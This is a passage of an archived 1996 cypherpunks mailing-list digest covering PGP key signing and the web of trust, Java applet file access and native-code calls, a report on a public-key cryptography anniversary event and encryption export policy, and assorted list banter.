4YIC1bgZKbcfKYr8ovaH0R2/xGe8V2HPcZZocCNCtQJodOPgwHGwU44E7JSugMTC
XsqtRt1Ost7n6X5e0AklQo2bYvTv5ylhrEybZA4Yeg1VYTITMxoTVdG4kKSQ4LWf
SV9qGV74kPldNfScTjfw/eP2hnIKvDDlveFgoeJD3/kN0sLkckzVkP+jkygMc2QZ
6h8278cvRjXzGndP+2jm0DrNBF9P8tGka9HSZZwyCDCwSlAdNy4EgYEpWNbFOSUn
g02GKEVZ5dz7CYQz3gd40VYYl5/B4Hktj69V+w==
=dPns
- -----END PGP PUBLIC KEY BLOCK-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMYWSfwSQkem38rwFAQE4+QP+Jzh1AJjwCMCDuWZoe5Tf3AaOz/M0x1AV
6VLmy5A2dk4Kqm/40bOd5PPzq6fQJUcke/PRKP55gXoXyFnZrurXBzB+ogpurzH3
+FKfpBEPjfZRvZzDF7/MNUCq7TpgEucIpe0jXNoCg/DxYkl84ZbEPdudnRhUjfaW
dE2XgLK+iUk=
=LD50
-----END PGP SIGNATURE-----

Disclaimer: My opinions are my own, not those of my employer.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 30 Apr 1996 17:15:48 +0800
To: unicorn@schloss.li>
Subject: Re: connecting Uni to the Web O Trust
Message-ID: <v02120d20adab4429605e@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 17:56 4/28/96, bryce@digicash.com wrote:

>I mean, I could explain it to him, but not even counting the
>difficulties of communicating such complex concepts among
>humans, there is the fact that if Mitch is here, he can
>prevent the real Uni from seeing the explanation, and he can
>act in Black Uni's place as if he understands.  Then he can
>go through the necessary steps to increase our trust in his
>pubkey, as if Uni were going through them.

It is generally acceptable to sign a key after seeing a very easily
forgable driver license. Even if you have seen the person before on TV, a
similar looking actor could be substituted, the true person could be
brainwashed, and what if the person has multiple personality disorder?
Should Jim's public key become invalid once John or Alexis have taken over?

The PGP web of trust is a practical solution for an imperfect world. Yes,
someone might have wrapped Uni into a bubble. But that would have to be
some damed good bubble for it to last so many years.


Disclaimer: My opinions are my own, not those of my employer.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Tue, 30 Apr 1996 17:23:39 +0800
To: geeman@best.com
Subject: Re: On computer face recognition:
In-Reply-To: <199604120630.XAA14255@dns1.noc.best.net>
Message-ID: <Pine.SV4.3.91.960429213705.3330B-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


<< "Results were successful (else why write about it?" >>


   Another believer in the tooth fairy. Send this kid to the "Real World 
Academic Life"  bootcamp, please.

Note that I am not making any comment on the success of this particular 
work.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 30 Apr 1996 17:03:49 +0800
To: cypherpunks@toad.com
Subject: Calling other code in Java applications and applets
Message-ID: <adaadb06040210042638@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:22 PM 4/29/96, sameer@c2.org wrote:
>>
>> Java applications can't save files to disk or use data files on
>> disk.
>
>        Uh, yes they can. It's the applets that can't.

And I believe that even applets can read and write data files on disk IF
THE APPLET ENVIRONMENT PERMITS this. Netscape and similar environments at
this time of course _don't_ let this happen, but this is a choice (as I
understand it) made at this time and perhaps for this version of the
respective pieces of software. (As I understand it, an explicit decision
not to allow file i/o, for some obvious though not necessarily permanent
reasons.)

Certainly the InputStream and OutputStream classes handle file i/o for Java
applications--if not applets in general, and presumably not with Netscape
2.0. I can imagine future developments which will allow browsers or similar
environments to have full file i/o capability. (Sure, there are dangers.
There are always dangers in running code gotten from others. These are
recurring problems. I expect lots of flavors of solutions, from signed
classes to "playpen" holding tanks (which allow file i/o, but only within
some constrained environment), and so on.)

By the way, I had a discussion at a party with several Sun folks and other
Java programmers, and they agreed that external code (C, for example) could
be called, even by an _applet_, if arranged. For example, various
underlying graphics routines in the AWT (Alternative Window Toolkit)
package are of course using underlying code written in various other
languages, code that has been reasonably optimized for speed.

"import java.awt.*" makes this code available to applications, and (I
believe) to applets within Netscape-type environments.

(I suspect there's a simple chart someplace showing what will run under
what constraints.)

The interesting thing here is that a crypto package, perhaps with
speed-optimized underlying routines in C or even hand-coded machine
language, could be released. It might be that patent holders (not that I am
endorsing this) could license such packages to users.

Thus,

import java.bignum.*
import.java.entropy.*
import java.rsa.*
import java.digicash.*
...

(Such packages may need approval by Sun, etc., and formal integration, a la
AWT. But certainly there is talk of replacing AWT with something else, so
changes and additions are clearly possible.)

Lastly, I don't believe that discussing the implications of Java justifies
the claim that "males are posturing." To me, discussing Java, virtual
machines, security issues, and advantages/disadvantages is what the list is
about, at least as much as the other topics we so often discuss.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 30 Apr 1996 18:14:21 +0800
To: cypherpunks@toad.com
Subject: Re: The Joy of Java
Message-ID: <adaae2b906021004f53b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:45 PM 4/29/96, Perry E. Metzger wrote:
>Scott Brickner writes:
>> I don't understand what you mean by "insufficiently powerful".  It's as
>> expressively powerful as most high-level languages, and computationally
>> Turing equivalent.  It's lack of power seems entirely in the performance
>> arena, which may be solved, eventually.
>
>Java applications can't save files to disk or use data files on
>disk. If you were, for instance, buying two CPU weeks of idle time on
>some machines, you would need stuff like checkpointing or the ability
>to save intermediate results.

Java applications _can_ save files to disk, and read them.

Further, even the presently-more-constrained applets can retrieve certain
types of files. For example, "getImage" and "getAudioClip" methods.

I mention this point for two reasons.

First, it says the applet model is not forever and totally blocked from
reading disk files. (And I would not be surprised to see additional file
retrieval methods "allowed." To be sure, this raises more and more security
issues to look at, but TANSTAAFL.)

Second, the relevance for providing sources of entropy for Java applets. I
haven't looked in detail, but I'll be willing to bet quite a bit that
someone has already or soon will run a QuickCam video input, not to mention
sound input, in a Java applet, and that this could easily be used as a
source of entropy bits.

--Tim

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Tue, 30 Apr 1996 17:23:39 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: On computer face recognition:
In-Reply-To: <ad931cb2140210040b59@[205.199.118.202]>
Message-ID: <Pine.SV4.3.91.960430000646.15711A-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


What task is the human brain optimized for ?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 30 Apr 1996 21:54:33 +0800
To: cypherpunks@toad.com
Subject: Re: Former CIA Director and *Strategic Investment* Editor
Message-ID: <m0uE9Zb-00092YC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:40 PM 4/29/96 EDT, Dr. Dimitri Vulis wrote:
>jim bell <jimbell@pacifier.com> writes:
>> At 04:06 AM 4/29/96 -0700, anonymous-remailer@shell.portal.com wrote:
>> >CNN is reporting that Colby's canoe has been found on the Potomac and
>> >Colby is missing.
>>
>> Don't tell me, let me guess:  The guy who rented the canoe to him has
>> suddenly retired, and has been reportedly seen going on a Park Avenue
>> shopping spree.  Right?
>
>Jim, I don't find dumb jokes about dead people I liked particularly funny.


Aren't you making an assumption that Colby is dead?  No body has been found, 
last I heard.   Maybe he just decided that he wanted to disappear in a 
comparatively non-suspicious fashion?


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 30 Apr 1996 18:36:44 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: arbiter/escrow agent for hire
In-Reply-To: <v02120d1eadab4107a3eb@[192.0.2.1]>
Message-ID: <Pine.SUN.3.93.960430002241.513E-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 29 Apr 1996, Lucky Green wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> At 17:43 4/28/96, bryce@digicash.com wrote:
> >-----BEGIN PGP SIGNED MESSAGE-----
> >
> > Black Unicorn <unicorn@schloss.li> wrote:
> >(> "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU> wrote:)
> >> >     IIRC, currently Black Unicorn doesn't have any signatures on
> >> > his public key of others. Therefore, this requirement, while
> >>understandable,
> >> > could cause a bit of a difficulty in the current situation.
> >>
> >> Please obtain a copy of my current key by finger.
> >
> >
> >Oh please.  My respect for Uni's acumen just decremented a
> >couple of notches.  A 2048-bit key, and no signatures?
> >Rather like a front door with welded plate armor and an open
> >window, no?
> 
> We had once had a thread on the list that discussed if it makes sense to
> sign keys for nyms you have never met. I think it does. Even seeing a
> driver licencse isn't 100% proof that the name stated on the doccument is
> the True Name of the person.
> 
> However, I am firmly convinced that the person using the PGP key
> pub  2048/4E685D39 1995/03/26 Black Unicorn <unicorn@access.digex.net>
>           Key fingerprint =  00 B9 28 9C 28 DC 0E 55  E1 6D 53 78 B8 1E 1C 96
> is the same Black Unicorn that is frequently posting to Cyphperpunks.
> 
> Therefore, I am willing to sign his key.

I hate to ask this of you.  Could you sign the new one (same ID, but it
has my more current addresses on it)

You can get it by finger, but I'll include it here too.

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQEPAy91JFIAAAEIALRKcL9qZZnqMn3fuDDxOd8+d2F+rqKB3Ff1U7+9Cp2CGugx
zfygey2nBEZQXiXG8fBi44iGAuHNc7TRRkQCr8srMwKXeU1Ue/fe5ACcDGy0H1ki
C0YYOuWFY2mtKCiqW3kcXWGFlDf418FbXftqJwSvMiIWIzgtepSWfzl5ApmguHjA
lTngdR+R557Cb6mgLV0Vug9yGyqXGeCqIs7Yx5SpakoIRwkkfniGa3m6L8+OgREY
bW6MoDPOfUox90xqJsDePB7b11l05I87V28s4FaTYH8CdmtdAun52/hLEAQKMXyz
g7jPlSQzpLObZ0OL3eiulHyC0aR4LWieb05oXTkAEQEAAbQiQmxhY2sgVW5pY29y
biA8dW5pY29ybkBzY2hsb3NzLmxpPokAlQMFEDF8faNVZJN3Wse4ZQEBcpYD/jQL
XhtkgYmvhqBUb65iidOMhq3jP+xMIw9K6ucYcjskf0yYLhq68QevAWxdGrfL4Gsg
PWW9db9v7Q3PTifokuVRrTA32S6l0rVPX3HSiwEgGLfQCNWz4jKcDYyaZolyFFWT
oAFqjzSo96M3H/MRT8nPoZqlcsu8WieU3QsNiKEkiQCVAwUQMXgRyE5ULTXct1Iz
AQGUrgQAs7tgiSzZOjiWFf0BAyk36gBpBJBevZHzUD05RSdIqyNsdKVmRgUxJlGU
SjBe01Qr+P2pfmV8EN1IhCju/1ZZsFAGN+iiVBpywTmUPpJIL2Gdx7f8u7pfFEdy
YmNGHZP+VLwnBBCyhfmvVUxdMCg6P77Wt4raBGJCz96dh3vtlvOJARUDBRAxcERY
LWieb05oXTkBAcjyB/sGnfvkOFbOv02/cvhktcME8EdonWVAaBremCyxwcoJ3XgJ
qBAJbU9SzwpqW5Apu1ulP7GmlpOYE9Umg2+VY9IsBIDg5orZtext7VCWbVjjfWGL
JJWFvEWgqflJ9yskz1VUE8VzSu6KFDRzDMXmKL4dH1PVh4J6byePJu9QplZUY+ed
k5vJXgVSlH/OXmjI/Z+YOpbH04g6by8pzBKCg/8LJeih3DHvjoVeBn4DdPHgAYwt
sPNbr3MAM+hW1cyG/EpO679CDjad3jSadkyXzBUKx3R7DRWqvzYEry3gKyLTlOAQ
Qyj9qY7/ajKEssjjb3f3IKFzxdOok1rd46KlWCHDtCRCbGFjayBVbmljb3JuIDx1
bmljb3JuQG1pbmRwb3J0Lm5ldD4=
=lURs
-----END PGP PUBLIC KEY BLOCK-----


---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 30 Apr 1996 20:23:59 +0800
To: Alan Horowitz <tcmay@got.net>
Subject: Re: On computer face recognition:
Message-ID: <v02120d2dadab77dc7e53@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 0:07 4/30/96, Alan Horowitz wrote:
>What task is the human brain optimized for ?

None. Which put us on top of the food chain.


Disclaimer: My opinions are my own, not those of my employer.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 30 Apr 1996 21:01:03 +0800
To: cypherpunks@toad.com
Subject: Re: Calling other code in Java applications and applets
Message-ID: <v02120d2eadab7900c2ca@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 21:50 4/29/96, Timothy C. May wrote:

>By the way, I had a discussion at a party with several Sun folks and other
>Java programmers, and they agreed that external code (C, for example) could
>be called, even by an _applet_, if arranged. For example, various
>underlying graphics routines in the AWT (Alternative Window Toolkit)
>package are of course using underlying code written in various other
>languages, code that has been reasonably optimized for speed.

I understand that calling C libs from Java is possible, but the details how
to go about that are still hazy to me. It is also unclear if Sun will
support this dual coding as a general capability that can be used by all
Java apps (don't think of Java just as downloadable applets) or require
that all modules, to give an example, for a certain soon to be very
relevant Java application to be written in 100% Java.

[...]
>The interesting thing here is that a crypto package, perhaps with
>speed-optimized underlying routines in C or even hand-coded machine
>language, could be released. It might be that patent holders (not that I am
>endorsing this) could license such packages to users.
>
>Thus,
>
>import java.bignum.*
>import.java.entropy.*
>import java.rsa.*
>import java.digicash.*
>...
>
>(Such packages may need approval by Sun, etc., and formal integration, a la
>AWT. But certainly there is talk of replacing AWT with something else, so
>changes and additions are clearly possible.)

Presumably, such packages would have to be signed by Sun. Needless to say,
these certificates would cost money. A potentially lucrative source of
revenue for Sun. Nothing wrong with that.


Disclaimer: My opinions are my own, not those of my employer.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 1 May 1996 00:39:30 +0800
To: cypherpunks@toad.com
Subject: [LONG] Churchill Club: 20th Anniversary PK Crypto
Message-ID: <199604300808.BAA17923@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


The moderator, David Morris of Cylink, introduced the field by discussing
the problems of corporate espionage, and privacy concerns vs. public and
private databases.  He said that the old security paradigms present with
face to face business don't work with electronic commerce.

He introduced Jim Omura, who gave an overview of PK encryption and
introduced Martin Hellman, Ralph Merkle, and Whitfield Diffie.  Louis
Morris, Cylink CEO, presented them with inscribed glass trophies.

Hellman described the key to the early years as being willing to be a fool,
because you need to step out of the standard thought patterns.  Diffie
described the genesis from 1974 to 1978 as going from Merkle's paper,
"Secure Communication Over Insecure Channels", thru DH key exchange, to
RSA.  Since 1976 is the center of gravity of these steps, this year makes a
good 20th anniversary.  Merkle said it is most striking how long it has
taken to be adopted.  Networks lead to a need for security, lead to a
questioning of regulations on Crypto, which leads to changes in those
regulations.  Diffie said it is absolutely amazing that it is happening so
quickly.  "How wonderfully lucky it is we started working 20 years ago."

Senator Larry Pressler (R, SD) was introduced via video projector from
Washington D.C.  He talked about bad government rules and that government
should help or at least get out of the way.  He talked about the need for
exports and to assist US multi-national businesses.  The controls hurt US
companies.  Encryption is the future of industry.  If we don't fix the
export problem, there are two outcomes.  (1) Foreign competition will
provide the function, or (2) US companies will move the R&D offshore. 
Either will cost US jobs.  After listing his [off topic] pet bills, he
mentioned that he was talking about encryption in software.  He said
Senator Burns' bill will be introduced tomorrow.

Senator Conrad Burns (R, MT) spoke from the podium in a joke filled speech.
 He talked about the Telecom Bill as a way to do something about giving
more people access to the glass highway.  He talked about the problem of
how do we make sure that people have agreed to a deal on the highway and
supporting sales.  He said we need the crypto bill to support them.  His
bill provides for, (1) Export of publicly available software (e.g. PGP and
browsers), (2) no GAK, (3) limiting the authority of the Department of
Commerce to set standards, and (4) export to countries which equivalent
technology.  He wants to have public hearings in Silicon Valley.

Then questions came from the floor:

Q: Why are we streamlining the Department of Commerce when the Department
of State and NSA are the problem?
Burns: Legislation will deal with this problem and prevent them from
blocking export.  You may still need a license, but there should be no
fences.
Pressler: We need to streamline relations between State and Commerce in
this area.  We need to streamline trade in hi tech.  I don't think that
state and NSA should have the say.  Export is a trade problem.  It is a
"disaster for American exports."
Burns: We are going to need grass-roots support to pass this bill.

Q: Where do California's senators (Feinstein and Boxer) stand?
Burns: We don't know.
Pressler: We didn't have their support on tort reform.  Stick with your
friends and work for them.

Q: Who is against the bill?
Burns: People who listen to NSA.  People who feel the US needs to be able
to watch you.

Q: How do you expect administration opposition to show up?
A: We don't know yet.

Q: Currently encryption is classified as a munition.  Will your legislation
reclassify it.
Pressler: We don't see encryption as a threat to national security.  People
in Washington D.C. who make a living suppressing information oppose the
bill.
Burns: We need your knowledge to pass this bill.

The senators bid us goodbye and the Congressman Robert Goodlatte (R, VA)
was introduced.  He said that President Clinton testified for 4.5 hours
over an encrypted communication link on the McDougall trial.  His bill is
called Security And Freedom thru Encryption (SAFE).  Local congressmen
Campbell and Eshoo are co-sponsors.  We need to broaden the base of support
for this bill.  Everyone should talk to their customers/vendors/and
companies with web sites about this issue.  If we don't change the rules,
it could cost $60B in 2000.  There are 500 foreign encryption software
products.  He talked about how fast 40 and 56 bit encryption could be
cracked and said that, in his opinion, the administration's desire to read
everything, foreign and domestic is the greatest threat.  He argues it is
the wrong approach and we should be encouraging everyone to use encryption
routinely.  We need it for counter terrorism against attacks on computer
systems used in design, manufacturing and e.g. controlling nuclear power
plants.  We need your help getting the word out.  Write your member of
congress.  We will have hearings on the bill in the next month or two.

Q: What do you say to techies/CEOs who want to run for public office?
A: Well are you a Democrat or Republican? (laughter).  Seriously, congress
needs a variety of backgrounds to help with technical issues.  Get good
expert advice on running your campaign.


James Freeman, Special Agent in Charge, San Francisco Office, FBI,
discussed the tools the FBI needs to do its job.  He talked about foreign
espionage on US companies.  He mentioned 800 cases involving 23 countries,
20% in the SF Bay area.  Counterfeit drugs cost US drug companies
$1.5B/year.  The FBI does not have adequate laws to pursue theft of
intellectual property.  It could use a computer fraud/abuse law.  

In the last few years, the FBI and local law enforcement have identified 9
gangs dealing in stolen electronic components thru undercover operations
and wiretaps.  Each set of arrests have reduced the rate of reported armed
robbery.  They used RICO to help prosecute these gangs.  He stated the FBI
can do the same for intellectual property given the right tools.

He stated that in some cases, foreign students are sent here to spy on US
corporations.  In some cases they are released from military service for
their spying.  Inside theft is responsible for most spying, but hacking and
computer intrusion are increasing.

He said that terrorists, money launders, drug dealers using crypto is a
serious threat, and he thinks GAK is a good solution.  If congress takes
GAK away from law enforcement, they will use the tools they have.  However
we need a balanced approach.

Q: If any high school student can implement unbreakable crypto, what can you do?
A: Regulation of crypto is the responsibility of congress.


Edward Kozel of Cisco Systems spoke about the problems they have had with
the export regulations.  He said that the Internet was important because it
lowered the barriers to market entry.  He offered the example that the big
3 American auto manufactures are requiring network links for their
suppliers.  He talked about attacks on hosts and networks.  He said that
right now, Atlanta is a boom area for telecommuting because Atlanta
companies fear the Olympics will bring gridlock this summer.  He suggested
micro payments as a solution to copyright problems.  We must see the
problem as a global problem.  PK is a fundamental component of commerce,
authentication, and non-repudiation.

Q (Dave Del Toro (sp?)): RSA patent license imposes significant limitations
on what we can do with RSA.  How can we overcome that barrier?
Morris (Cylink): Cylink owns the DH patents.  We are opening the technology
with no-cost licenses.  Patents should not be used to block the technology.
Kozel: We certainly support open dissemination.  In 1990 we couldn't export
routers to e.g. Russia.  So they used PCs and public domain software to
build their nets.  Now they are converting to routers.  Now is the time to
unleash encryption.

Q: What is the best way to go given the new laws and IPv6?
Kozel: 40 bits is no good.  Even people in rural Australia know that. 
Industry needs to recognize the need for controls, if only by the customer.
 The technology is moving to the mass market.  Encryption will be needed to
keep everyone from reading data on cable networks.


Paul Raines, Project Manager, United States Postal Service described the
post offices digital postmark and certificate services.  Cylink is the
technical developer.  The post office brings four things that private
industry can't: (1) The postal fraud statutes, (2) A long track record and
well established reputation, (3) 40,000 existing post offices (vs. 10,000
McDonald's), and (4) it can act as a trusted third party.

Q: How much will you charge for these services and when will they be available?
A: Postmarking: $.10, 7/96.  Certificates: $10-$15/person/year, 4Q96.

Q: Do you see the post office acting as an ISP?
A: Only to the extent necessary to provide electronic delivery of digital
postmarks and certificates.

Q: Do you see the post office going into transaction verification?  What
limits your future business directions?
A: We will make sure not to compete with private business.  Because we must
go through a rate commission to change prices makes it hard to compete.


The evening closed with a Diffie, Hellman, Merkle panel.

Hellman: After these 20 years, I feel less of a fool.  When we wrote "New
Directions in Cryptography" in 1976, we envisioned our ideas would be
widespread in five years.
Diffie: I was excessively optimistic about the spread of PKC in two of my
papers.
Hellman: We were off for two reasons.  (1) Lack of public concern.  With
cell phone fraud approaching 40% that may change.  And (2) ITAR.  This new
legislation will have a very positive effect.
Merkle: I wish I could pipe the comments this evening back 20 years.  I
would particular like to pipe them to my rejection letter from
Communications of the ACM which said my contribution was not mainstream. 
One is often over optimistic about the early rate of progress and under
optimistic about the later rate.  OK, I was wrong before, but things are
going to happen fast now.
Morris: Where are the new frontiers?
Diffie: Quantum computing (if it works).  Elliptic curve crypto.  The next
decade or so will be used to sort out the social effects.  Passive
listening by major governments is moving to active computer penetration. 
What will our high-level security specifications be?  What are fair rules
for intellectual property, privacy etc?


We closed with David Morris reading email from Phil Mellinger, Chief
Engineer, Government Securities Association.  He said the US and Canada are
discussing inter operability on Certificate authorities.  The government is
using DH with DES and SHA for government communications.  Short of the
automobile, PKC has had the largest effect on the world of any 20th century
technology.


Impressions:  In conversation afterwards, I noted that discussion of
personal privacy seemed to be politically incorrect in this group.  Unless
it directly supported corporate commerce, we didn't discuss it.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Purshottam <woutput@earthlink.net>
Date: Wed, 1 May 1996 01:29:35 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Calling other code in Java applications and applets
In-Reply-To: <adaadb06040210042638@[205.199.118.202]>
Message-ID: <31856BCD.463A@earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> And I believe that even applets can read and write data files on disk IF
> THE APPLET ENVIRONMENT PERMITS this. Netscape and similar environments at
> this time of course _don't_ let this happen, but this is a choice (as I
> understand it) made at this time and perhaps for this version of the
> respective pieces of software. (As I understand it, an explicit decision
> not to allow file i/o, for some obvious though not necessarily permanent
> reasons.)
This is correct. A class called the SecurityManager enforces this,
and it can be changed or shut off if one builds a custom version of the
classes zip file that has the appropriate changes to the security manager.
There was a posting to a java news group or mailing list about how to do
this a few months ago, I can find it if anyone cares.

Andy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Tue, 30 Apr 1996 19:34:34 +0800
To: "Dr. Dimitri Vulis" <dlv@bwalk.dm.com>
Subject: Re: Former CIA Director and *Strategic Investment* Editor
In-Reply-To: <mm86mD267w165w@bwalk.dm.com>
Message-ID: <Pine.3.89.9604300101.A16052-0100000@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 29 Apr 1996, Dr. Dimitri Vulis wrote:

> jim bell <jimbell@pacifier.com> writes:
> > At 04:06 AM 4/29/96 -0700, anonymous-remailer@shell.portal.com wrote:
> > >CNN is reporting that Colby's canoe has been found on the Potomac and
> > >Colby is missing.
> >
> > Don't tell me, let me guess:  The guy who rented the canoe to him has
> > suddenly retired, and has been reportedly seen going on a Park Avenue
> > shopping spree.  Right?
> 
> Jim, I don't find dumb jokes about dead people I liked particularly funny.

CNN is reporting that although the search is continuing, the authorities 
are presuming Colby drowned in a boating accident.
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 30 Apr 1996 14:55:30 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199604300025.CAA28426@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


"I am sorry if you misunderstood my previous email. We are ex-Stanford
grad, not current students! The WhoWhere? database is collected through
a combination of technolofy, partnerships, and self-registrations by
end-users.

Our content is from publicly available sources."

http://ergos-home.stanford.edu/whowhere.logo.gif

         name: Doremieux, Francois Yves Jean
       e-mail: 96francoid@Gsb
   department: Business
         year: Graduate
        phone: (415) 497-4334





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 1 May 1996 02:37:56 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Calling other code in Java applications and applets
In-Reply-To: <v02120d2eadab7900c2ca@[192.0.2.1]>
Message-ID: <3185E5B6.3EE8@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green wrote:
> 
> At 21:50 4/29/96, Timothy C. May wrote:
> 
> >By the way, I had a discussion at a party with several Sun folks and other
> >Java programmers, and they agreed that external code (C, for example) could
> >be called, even by an _applet_, if arranged. For example, various
> >underlying graphics routines in the AWT (Alternative Window Toolkit)
> >package are of course using underlying code written in various other
> >languages, code that has been reasonably optimized for speed.
> 
> I understand that calling C libs from Java is possible, but the details how
> to go about that are still hazy to me. It is also unclear if Sun will
> support this dual coding as a general capability that can be used by all
> Java apps (don't think of Java just as downloadable applets) or require
> that all modules, to give an example, for a certain soon to be very
> relevant Java application to be written in 100% Java.

  Our Navigator 3.0 release will allow java and javascript to call into
plugins.  Since plugins are native code, you will be able to freely mix
C and Java.  Of course you will have to get the user to install your
plugin on their disk.  

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Wern <bwern@jaxnet.com>
Date: Tue, 30 Apr 1996 20:14:41 +0800
To: cypherpunks@toad.com
Subject: Re: Neuron Magnetics (Data Needed)
Message-ID: <2.2.16.19960430073154.6ee7f202@192.1.1.9>
MIME-Version: 1.0
Content-Type: text/plain


There has been a recent discussion on dc-stuff about Dallas Semiconductor's
Touch Memory stuff. (http://www.dalsemi.com)
Has anyone played with these? Any info on the security / insecurity of the
methods they use? Perhaps a cheap way to encode pgp / similar  keys onto a
card technology?

Ben Wern

 bwern@jaxnet.com or bwern@unf.edu
    Try New and Improved Jello: V 2.0
"I may not have gone where I intended to go, but I think 
   I have ended up where I intended to be."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Tue, 30 Apr 1996 18:52:44 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Social Transformation, Not Tax Evision
Message-ID: <199604300501.WAA23276@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


** Reply to note from Duncan Frissell <frissell@panix.com> 04/29/96 10:28am -0400

= "God fights on the side with the heaviest artillery.  These days MarketEarth 
= has the heaviest artillery." 

	just because you carry, like everyone else, carrying God's banners does not 
    mean God is on your side, or the side with the heaviest artillery.  God is on 
    the side of those who have faith and charity-- nothing else required.

	the heaviest artillery is nothing more than man's pride, not his humility; 
    pride will not bring you to the celestial kingdom, nor will you inherit the 
    earth.



--
Overseeing first-rate programmers is a managerial challenge 
  roughly comparable to herding cats.

cc: Cypherpunks <cypherpunks@toad.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Tue, 30 Apr 1996 22:16:46 +0800
